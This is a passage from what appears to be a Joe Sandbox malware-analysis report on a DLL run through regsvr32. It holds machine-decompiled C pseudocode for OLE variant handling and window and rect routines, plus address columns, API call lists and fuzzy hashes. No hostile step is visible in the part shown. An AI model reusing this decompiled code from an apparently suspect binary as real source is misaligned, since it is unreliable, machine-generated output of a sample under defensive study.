                                                                                                                								if(__eflags == 0) {
                                                                                                                									_t200 = E10031796(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
                                                                                                                									__eflags = _t200;
                                                                                                                									if(_t200 != 0) {
                                                                                                                										__eflags =  *(_t346 + 0x55);
                                                                                                                										asm("fild qword [ebp+0x57]");
                                                                                                                										if( *(_t346 + 0x55) > 0) {
                                                                                                                											do {
                                                                                                                												_t139 = _t346 + 0x55;
                                                                                                                												 *_t139 =  *(_t346 + 0x55) - 1;
                                                                                                                												__eflags =  *_t139;
                                                                                                                												_t358 = _t358 /  *0x1005d258;
                                                                                                                											} while ( *_t139 != 0);
                                                                                                                										}
                                                                                                                										__eflags =  *(_t346 + 0x56);
                                                                                                                										if( *(_t346 + 0x56) == 0) {
                                                                                                                											asm("fchs");
                                                                                                                										}
                                                                                                                										 *(_t346 - 0x14) = _t358;
                                                                                                                										 *(_t346 - 0x1c) = 5;
                                                                                                                										 *((char*)(_t346 - 4)) = 0xe;
                                                                                                                										E1002A10B(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
                                                                                                                										_t203 = _t346 - 0x1c;
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_t206 = _t198;
                                                                                                                									__eflags = _t206;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										__eflags = E100317C0(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
                                                                                                                										if(__eflags != 0) {
                                                                                                                											asm("fldz");
                                                                                                                											 *(_t346 + 0x58) = _t358;
                                                                                                                											_t337 =  *(_t346 + 0x34);
                                                                                                                											 *((intOrPtr*)(_t346 + 0x60)) = 0;
                                                                                                                											E1002A35C(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
                                                                                                                											 *_t346 = 7;
                                                                                                                											 *(_t346 + 8) =  *(_t346 + 0x58);
                                                                                                                											 *((char*)(_t346 - 4)) = 0xf;
                                                                                                                											E1002A10B(_t346, _t346 + 0x3c, _t346);
                                                                                                                											_t203 = _t346;
                                                                                                                											goto L30;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t213 = _t206 - 1;
                                                                                                                										__eflags = _t213;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_t215 = E100317C0(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
                                                                                                                											__eflags = _t215;
                                                                                                                											if(_t215 != 0) {
                                                                                                                												asm("fldz");
                                                                                                                												 *(_t346 + 0x58) = _t358;
                                                                                                                												 *((intOrPtr*)(_t346 + 0x60)) = 0;
                                                                                                                												E1002FA46( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
                                                                                                                												 *(_t346 - 0x4c) = 7;
                                                                                                                												 *(_t346 - 0x44) =  *(_t346 + 0x58);
                                                                                                                												 *((char*)(_t346 - 4)) = 0x10;
                                                                                                                												E1002A10B(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
                                                                                                                												_t203 = _t346 - 0x4c;
                                                                                                                												goto L30;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											__eflags = _t213 - 1;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												_t224 = E100317F5(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
                                                                                                                												__eflags = _t224;
                                                                                                                												if(_t224 != 0) {
                                                                                                                													_t231 = E100319A1(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
                                                                                                                													 *(_t346 - 0x3c) = 7;
                                                                                                                													 *((long long*)(_t346 - 0x34)) =  *_t231;
                                                                                                                													 *((char*)(_t346 - 4)) = 0x11;
                                                                                                                													E1002A10B(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
                                                                                                                													_t203 = _t346 - 0x3c;
                                                                                                                													goto L30;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t235 = E10005030(_t337, _t346, E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                								 *((char*)(_t346 - 4)) = 2;
                                                                                                                								_t237 = E1002A4B8(0, _t346 - 0xbc, _t340, _t345, __eflags);
                                                                                                                								 *((char*)(_t346 - 4)) = 3;
                                                                                                                								E1002A10B(_t237, _t346 + 0x3c, _t237);
                                                                                                                								 *_t345(_t346 - 0xbc,  *_t235, 8);
                                                                                                                								_t295 =  *(_t346 + 0x50);
                                                                                                                								goto L51;
                                                                                                                							} else {
                                                                                                                								__eflags = _t184 - 8;
                                                                                                                								if(__eflags > 0) {
                                                                                                                									__eflags = _t184 - 0xb;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t243 = E1002A054(_t346 - 0x9c,  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
                                                                                                                										 *((char*)(_t346 - 4)) = 0xb;
                                                                                                                										E1002A10B(_t243, _t346 + 0x3c, _t243);
                                                                                                                										_t203 = _t346 - 0x9c;
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										__eflags = _t184 - 0xc;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_t246 = E1002A3BC(_t346 - 0x8c, E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                											 *((char*)(_t346 - 4)) = 1;
                                                                                                                											E1002A10B(_t246, _t346 + 0x3c, _t246);
                                                                                                                											_t203 = _t346 - 0x8c;
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											__eflags = _t184 - 0xf;
                                                                                                                											if(_t184 > 0xf) {
                                                                                                                												__eflags = _t184 - 0x11;
                                                                                                                												if(__eflags <= 0) {
                                                                                                                													_t248 = E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
                                                                                                                													 *(_t346 - 0x5c) = 0x11;
                                                                                                                													 *((char*)(_t346 - 0x54)) =  *_t248;
                                                                                                                													 *((char*)(_t346 - 4)) = 6;
                                                                                                                													E1002A10B(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
                                                                                                                													_t203 = _t346 - 0x5c;
                                                                                                                													goto L30;
                                                                                                                												} else {
                                                                                                                													__eflags = _t184 - 0x12;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														goto L27;
                                                                                                                													} else {
                                                                                                                														__eflags = _t184 - 0x13;
                                                                                                                														if(__eflags == 0) {
                                                                                                                															goto L26;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(__eflags == 0) {
                                                                                                                										L50:
                                                                                                                										_t187 = E10017166(0, _t346 + 0x30, _t337, _t340, _t345, __eflags);
                                                                                                                										 *((char*)(_t346 - 4)) = 4;
                                                                                                                										_t189 = E1002A4B8(0, _t346 - 0xcc, _t340, _t345, __eflags);
                                                                                                                										 *((char*)(_t346 - 4)) = 5;
                                                                                                                										E1002A10B(_t189, _t346 + 0x3c, _t189);
                                                                                                                										 *_t345(_t346 - 0xcc,  *_t187, 8, E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                										_t295 =  *(_t346 + 0x30);
                                                                                                                										L51:
                                                                                                                										__eflags = _t295 + 0xfffffff0;
                                                                                                                										 *((char*)(_t346 - 4)) = 0;
                                                                                                                										E10001020(_t295 + 0xfffffff0, _t337);
                                                                                                                									} else {
                                                                                                                										_t260 = _t184;
                                                                                                                										__eflags = _t260;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											L27:
                                                                                                                											_t254 = E1002A054(_t346 - 0xac,  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
                                                                                                                											 *((char*)(_t346 - 4)) = 7;
                                                                                                                											E1002A10B(_t254, _t346 + 0x3c, _t254);
                                                                                                                											_t203 = _t346 - 0xac;
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											_t261 = _t260 - 1;
                                                                                                                											__eflags = _t261;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												L26:
                                                                                                                												_t257 = E1002A07B(_t346 - 0x7c,  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
                                                                                                                												 *((char*)(_t346 - 4)) = 8;
                                                                                                                												E1002A10B(_t257, _t346 + 0x3c, _t257);
                                                                                                                												_t203 = _t346 - 0x7c;
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												_t262 = _t261 - 1;
                                                                                                                												__eflags = _t262;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													 *(_t346 + 0x50) =  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                													 *(_t346 + 0x10) = 4;
                                                                                                                													 *(_t346 + 0x18) =  *(_t346 + 0x50);
                                                                                                                													 *((char*)(_t346 - 4)) = 9;
                                                                                                                													E1002A10B(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
                                                                                                                													_t203 = _t346 + 0x10;
                                                                                                                													goto L30;
                                                                                                                												} else {
                                                                                                                													_t266 = _t262 - 1;
                                                                                                                													__eflags = _t266;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														 *(_t346 - 0x24) =  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                														 *(_t346 - 0x2c) = 5;
                                                                                                                														 *((char*)(_t346 - 4)) = 0xa;
                                                                                                                														E1002A10B(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
                                                                                                                														_t203 = _t346 - 0x2c;
                                                                                                                														goto L30;
                                                                                                                													} else {
                                                                                                                														_t270 = _t266 - 1;
                                                                                                                														__eflags = _t270;
                                                                                                                														if(__eflags == 0) {
                                                                                                                															_t271 = E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
                                                                                                                															 *(_t346 + 0x20) = 6;
                                                                                                                															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
                                                                                                                															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
                                                                                                                															 *((char*)(_t346 - 4)) = 0xd;
                                                                                                                															E1002A10B(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
                                                                                                                															_t203 = _t346 + 0x20;
                                                                                                                															goto L30;
                                                                                                                														} else {
                                                                                                                															__eflags = _t270 - 1;
                                                                                                                															if(__eflags == 0) {
                                                                                                                																 *(_t346 - 0x64) =  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                																 *(_t346 - 0x6c) = 7;
                                                                                                                																 *((char*)(_t346 - 4)) = 0xc;
                                                                                                                																E1002A10B(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
                                                                                                                																_t203 = _t346 - 0x6c;
                                                                                                                																L30:
                                                                                                                																 *((char*)(_t346 - 4)) = 0;
                                                                                                                																 *_t345(_t203);
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						E1002A3BC( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
                                                                                                                						 *_t345(_t346 + 0x3c);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					E1002A3BC( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
                                                                                                                					__imp__#9(_t346 + 0x3c);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
                                                                                                                				_pop(_t341);
                                                                                                                				_pop(_t344);
                                                                                                                				_pop(_t281);
                                                                                                                				return E1003B437( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
                                                                                                                			}










































                                                                                                                0x1003437b
                                                                                                                0x1003437b
                                                                                                                0x1003437b
                                                                                                                0x1003437b
                                                                                                                0x1003437e
                                                                                                                0x1003437e
                                                                                                                0x1003437b
                                                                                                                0x10034386
                                                                                                                0x10034389
                                                                                                                0x1003438b
                                                                                                                0x1003438b
                                                                                                                0x1003438d
                                                                                                                0x10034390
                                                                                                                0x1003439d
                                                                                                                0x100343a1
                                                                                                                0x100343a6
                                                                                                                0x00000000
                                                                                                                0x100343a6
                                                                                                                0x10034234
                                                                                                                0x10034235
                                                                                                                0x10034235
                                                                                                                0x10034236
                                                                                                                0x1003430f
                                                                                                                0x10034311
                                                                                                                0x1003431b
                                                                                                                0x10034321
                                                                                                                0x10034324
                                                                                                                0x10034331
                                                                                                                0x10034334
                                                                                                                0x10034339
                                                                                                                0x10034342
                                                                                                                0x1003434c
                                                                                                                0x10034350
                                                                                                                0x10034355
                                                                                                                0x00000000
                                                                                                                0x10034355
                                                                                                                0x1003423c
                                                                                                                0x1003423c
                                                                                                                0x1003423c
                                                                                                                0x1003423d
                                                                                                                0x100342b1
                                                                                                                0x100342b6
                                                                                                                0x100342b8
                                                                                                                0x100342c2
                                                                                                                0x100342c5
                                                                                                                0x100342d5
                                                                                                                0x100342d8
                                                                                                                0x100342dd
                                                                                                                0x100342e6
                                                                                                                0x100342f0
                                                                                                                0x100342f4
                                                                                                                0x100342f9
                                                                                                                0x00000000
                                                                                                                0x100342f9
                                                                                                                0x1003423f
                                                                                                                0x1003423f
                                                                                                                0x10034240
                                                                                                                0x1003424f
                                                                                                                0x10034254
                                                                                                                0x10034256
                                                                                                                0x10034280
                                                                                                                0x10034285
                                                                                                                0x1003428d
                                                                                                                0x10034297
                                                                                                                0x1003429b
                                                                                                                0x100342a0
                                                                                                                0x00000000
                                                                                                                0x100342a0
                                                                                                                0x10034256
                                                                                                                0x10034240
                                                                                                                0x1003423d
                                                                                                                0x10034236
                                                                                                                0x1003422e
                                                                                                                0x10033fce
                                                                                                                0x10033fce
                                                                                                                0x100341eb
                                                                                                                0x100341fb
                                                                                                                0x100341ff
                                                                                                                0x10034208
                                                                                                                0x1003420c
                                                                                                                0x10034218
                                                                                                                0x1003421a
                                                                                                                0x00000000
                                                                                                                0x10033fd4
                                                                                                                0x10033fd4
                                                                                                                0x10033fd7
                                                                                                                0x100340c6
                                                                                                                0x100340c9
                                                                                                                0x100341c3
                                                                                                                0x100341cc
                                                                                                                0x100341d0
                                                                                                                0x100341d5
                                                                                                                0x00000000
                                                                                                                0x100340cf
                                                                                                                0x100340cf
                                                                                                                0x100340d2
                                                                                                                0x1003418a
                                                                                                                0x10034193
                                                                                                                0x10034197
                                                                                                                0x1003419c
                                                                                                                0x00000000
                                                                                                                0x100340d8
                                                                                                                0x100340d8
                                                                                                                0x100340db
                                                                                                                0x100340e1
                                                                                                                0x100340e4
                                                                                                                0x10034154
                                                                                                                0x1003415b
                                                                                                                0x10034161
                                                                                                                0x1003416b
                                                                                                                0x1003416f
                                                                                                                0x10034174
                                                                                                                0x00000000
                                                                                                                0x100340e6
                                                                                                                0x100340e6
                                                                                                                0x100340e9
                                                                                                                0x00000000
                                                                                                                0x100340eb
                                                                                                                0x100340eb
                                                                                                                0x100340ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100340ee
                                                                                                                0x100340e9
                                                                                                                0x100340e4
                                                                                                                0x100340db
                                                                                                                0x100340d2
                                                                                                                0x10033fdd
                                                                                                                0x10033fdd
                                                                                                                0x100343ae
                                                                                                                0x100343bc
                                                                                                                0x100343cc
                                                                                                                0x100343d0
                                                                                                                0x100343d9
                                                                                                                0x100343dd
                                                                                                                0x100343e9
                                                                                                                0x100343eb
                                                                                                                0x100343ee
                                                                                                                0x100343ee
                                                                                                                0x100343f1
                                                                                                                0x100343f4
                                                                                                                0x10033fe3
                                                                                                                0x10033fe4
                                                                                                                0x10033fe4
                                                                                                                0x10033fe5
                                                                                                                0x1003411f
                                                                                                                0x10034135
                                                                                                                0x1003413e
                                                                                                                0x10034142
                                                                                                                0x10034147
                                                                                                                0x00000000
                                                                                                                0x10033feb
                                                                                                                0x10033feb
                                                                                                                0x10033feb
                                                                                                                0x10033fec
                                                                                                                0x100340f4
                                                                                                                0x10034105
                                                                                                                0x1003410e
                                                                                                                0x10034112
                                                                                                                0x10034117
                                                                                                                0x00000000
                                                                                                                0x10033ff2
                                                                                                                0x10033ff2
                                                                                                                0x10033ff2
                                                                                                                0x10033ff3
                                                                                                                0x1003409f
                                                                                                                0x100340a2
                                                                                                                0x100340ab
                                                                                                                0x100340b5
                                                                                                                0x100340b9
                                                                                                                0x100340be
                                                                                                                0x00000000
                                                                                                                0x10033ff9
                                                                                                                0x10033ff9
                                                                                                                0x10033ff9
                                                                                                                0x10033ffa
                                                                                                                0x10034072
                                                                                                                0x10034075
                                                                                                                0x10034082
                                                                                                                0x10034086
                                                                                                                0x1003408b
                                                                                                                0x00000000
                                                                                                                0x10033ffc
                                                                                                                0x10033ffc
                                                                                                                0x10033ffc
                                                                                                                0x10033ffd
                                                                                                                0x10034038
                                                                                                                0x10034042
                                                                                                                0x10034048
                                                                                                                0x1003404b
                                                                                                                0x10034055
                                                                                                                0x10034059
                                                                                                                0x1003405e
                                                                                                                0x00000000
                                                                                                                0x10033fff
                                                                                                                0x10033fff
                                                                                                                0x10034000
                                                                                                                0x10034012
                                                                                                                0x10034015
                                                                                                                0x10034022
                                                                                                                0x10034026
                                                                                                                0x1003402b
                                                                                                                0x100341a2
                                                                                                                0x100341a3
                                                                                                                0x100341a6
                                                                                                                0x100341a6
                                                                                                                0x10034000
                                                                                                                0x10033ffd
                                                                                                                0x10033ffa
                                                                                                                0x10033ff3
                                                                                                                0x10033fec
                                                                                                                0x10033fe5
                                                                                                                0x10033fdd
                                                                                                                0x10033fd7
                                                                                                                0x10033fce
                                                                                                                0x10034400
                                                                                                                0x10034409
                                                                                                                0x10034409
                                                                                                                0x10033f87
                                                                                                                0x10033f87
                                                                                                                0x10033f8e
                                                                                                                0x10033f97
                                                                                                                0x10033f97
                                                                                                                0x10034411
                                                                                                                0x10034419
                                                                                                                0x1003441a
                                                                                                                0x1003441b
                                                                                                                0x1003442a

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10033F32
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10033F97
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100341A6
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10034218
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10034409
                                                                                                                  • Part of subcall function 1002A10B: VariantCopy.OLEAUT32(?,?), ref: 1002A119
                                                                                                                  • Part of subcall function 1002A4B8: __EH_prolog3.LIBCMT ref: 1002A4C2
                                                                                                                  • Part of subcall function 1002A4B8: lstrlenA.KERNEL32(?,?,?,00000224), ref: 1002A4E1
                                                                                                                  • Part of subcall function 1002A4B8: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002A4E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$H_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1791476184-0
                                                                                                                • Opcode ID: e1327913ead6246f29673d50ac3e487507b361d8352e8eaf00822395e0ab80ff
                                                                                                                • Instruction ID: 09c86e58abf00dc0f56b5a78a577800547e1b0ef494a109da026d4d4a3b1e213
                                                                                                                • Opcode Fuzzy Hash: e1327913ead6246f29673d50ac3e487507b361d8352e8eaf00822395e0ab80ff
                                                                                                                • Instruction Fuzzy Hash: 88F1497880014CEEDF16DFA0C8909ED7BB9EF08341F81805AFD519B291DF74AA88DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10039A4B: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10039A8C
                                                                                                                  • Part of subcall function 10039A4B: SetRectEmpty.USER32(?), ref: 10039AB0
                                                                                                                  • Part of subcall function 10039A4B: GetDesktopWindow.USER32 ref: 10039AC8
                                                                                                                  • Part of subcall function 10039A4B: LockWindowUpdate.USER32(?), ref: 10039AD9
                                                                                                                  • Part of subcall function 10039A4B: GetDCEx.USER32 ref: 10039AF0
                                                                                                                  • Part of subcall function 10023E56: GetModuleHandleA.KERNEL32(GDI32.DLL,?,1003A15C), ref: 10023E5E
                                                                                                                  • Part of subcall function 10023E56: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10023E6A
                                                                                                                • GetWindowRect.USER32 ref: 1003A182
                                                                                                                  • Part of subcall function 10023E8C: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1003A169,00000000), ref: 10023E95
                                                                                                                  • Part of subcall function 10023E8C: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1003A169,00000000), ref: 10023EA3
                                                                                                                • InflateRect.USER32 ref: 1003A274
                                                                                                                • InflateRect.USER32 ref: 1003A41A
                                                                                                                  • Part of subcall function 10039923: OffsetRect.USER32 ref: 1003995A
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039C92
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039C9C
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039CA6
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039CB0
                                                                                                                  • Part of subcall function 1003A01A: GetCapture.USER32 ref: 1003A02B
                                                                                                                  • Part of subcall function 1003A01A: SetCapture.USER32(?), ref: 1003A03B
                                                                                                                  • Part of subcall function 1003A01A: GetCapture.USER32 ref: 1003A047
                                                                                                                  • Part of subcall function 1003A01A: GetMessageA.USER32 ref: 1003A061
                                                                                                                  • Part of subcall function 1003A01A: DispatchMessageA.USER32 ref: 1003A093
                                                                                                                  • Part of subcall function 1003A01A: GetCapture.USER32 ref: 1003A0F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1062258019-0
                                                                                                                • Opcode ID: 5638e21eaa3b4bd5c33c31e36ca3bd77f01a579d162c68711d773bd113cdf187
                                                                                                                • Instruction ID: bec46a71e5a49e7b2dec3384879b20c7eb10a58319cbce7a36d64cb5955b44f6
                                                                                                                • Opcode Fuzzy Hash: 5638e21eaa3b4bd5c33c31e36ca3bd77f01a579d162c68711d773bd113cdf187
                                                                                                                • Instruction Fuzzy Hash: C6B12B76900618AFCF01DFA4C881EEE7BBAEF4A311F104594FD05AF256D671AE84CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1002CAD4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				CHAR* _t121;
                                                                                                                				int _t122;
                                                                                                                				CHAR* _t127;
                                                                                                                				CHAR* _t135;
                                                                                                                				CHAR* _t140;
                                                                                                                				signed short* _t142;
                                                                                                                				CHAR* _t144;
                                                                                                                				CHAR* _t148;
                                                                                                                				CHAR* _t151;
                                                                                                                				signed int _t158;
                                                                                                                				signed int _t169;
                                                                                                                				CHAR* _t173;
                                                                                                                				void* _t176;
                                                                                                                				void* _t179;
                                                                                                                				signed short _t181;
                                                                                                                				signed int _t183;
                                                                                                                				intOrPtr _t185;
                                                                                                                				CHAR* _t188;
                                                                                                                				int _t190;
                                                                                                                				char* _t193;
                                                                                                                				void* _t194;
                                                                                                                				void* _t195;
                                                                                                                				CHAR* _t196;
                                                                                                                				char* _t198;
                                                                                                                				void* _t199;
                                                                                                                				long long _t204;
                                                                                                                
                                                                                                                				_t199 = __eflags;
                                                                                                                				_t185 = __edx;
                                                                                                                				_push(0x50);
                                                                                                                				E1003D285(E10054167, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
                                                                                                                				E100231D3(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
                                                                                                                				_t173 =  *(_t195 + 8);
                                                                                                                				_t121 = _t173[8];
                                                                                                                				_t187 = 0;
                                                                                                                				 *(_t195 - 4) = 0;
                                                                                                                				 *(_t195 - 0x1d) = 0;
                                                                                                                				 *(_t195 - 0x18) = _t121;
                                                                                                                				if(_t121 == 0) {
                                                                                                                					 *(_t195 - 0x18) = _t195 - 0x1d;
                                                                                                                				}
                                                                                                                				_t122 = lstrlenA( *(_t195 - 0x18));
                                                                                                                				_t201 =  *(_t195 + 0xc) & 0x0000000c;
                                                                                                                				_t190 = _t122;
                                                                                                                				 *(_t195 - 0x28) = _t173[0x10];
                                                                                                                				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
                                                                                                                				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
                                                                                                                					L11:
                                                                                                                					_t191 =  *(_t195 + 0x14);
                                                                                                                					_t127 = E100151B0(_t185, __eflags,  *(_t191 + 8) << 4);
                                                                                                                					__eflags = _t127;
                                                                                                                					_pop(_t176);
                                                                                                                					if(_t127 != 0) {
                                                                                                                						_t191 =  *(_t191 + 8);
                                                                                                                						__eflags = _t191 - 0x7ffffff;
                                                                                                                						if(_t191 > 0x7ffffff) {
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						_t192 = _t191 << 4;
                                                                                                                						E1003CBD0(_t191 << 4);
                                                                                                                						 *(_t195 - 0x10) = _t196;
                                                                                                                						 *(_t195 - 0x1c) = _t196;
                                                                                                                						E1003BB70(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
                                                                                                                						_t198 =  &(_t196[0xc]);
                                                                                                                						_t187 = E1002C6C6(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
                                                                                                                						_t49 = _t187 + 0x10; // 0x10
                                                                                                                						_t191 = _t49;
                                                                                                                						_t135 = E100151B0(_t185, __eflags, _t49);
                                                                                                                						__eflags = _t135;
                                                                                                                						if(_t135 == 0) {
                                                                                                                							L4:
                                                                                                                							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                							if( *(_t195 - 0x2c) == 0) {
                                                                                                                								L7:
                                                                                                                								L55:
                                                                                                                								return E1003D2E1(_t173, _t187, _t191);
                                                                                                                							}
                                                                                                                							_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                							_push(0);
                                                                                                                							L6:
                                                                                                                							E10022A6E();
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						E1003CBD0(_t191);
                                                                                                                						 *(_t195 - 0x10) = _t198;
                                                                                                                						_t173 = 0;
                                                                                                                						_t193 = _t198;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x58)) = 0x1005a004;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x54)) = 0;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x48)) = 0;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x50)) = 0;
                                                                                                                						_push(_t195 - 0x58);
                                                                                                                						_push( *(_t195 - 0x1c));
                                                                                                                						_push( *((intOrPtr*)(_t195 + 0x18)));
                                                                                                                						 *(_t195 - 4) = 1;
                                                                                                                						_push( *(_t195 + 0x14));
                                                                                                                						_push( *(_t195 - 0x24));
                                                                                                                						_push(_t195 - 0x44);
                                                                                                                						_push( *(_t195 - 0x18));
                                                                                                                						_push(_t193);
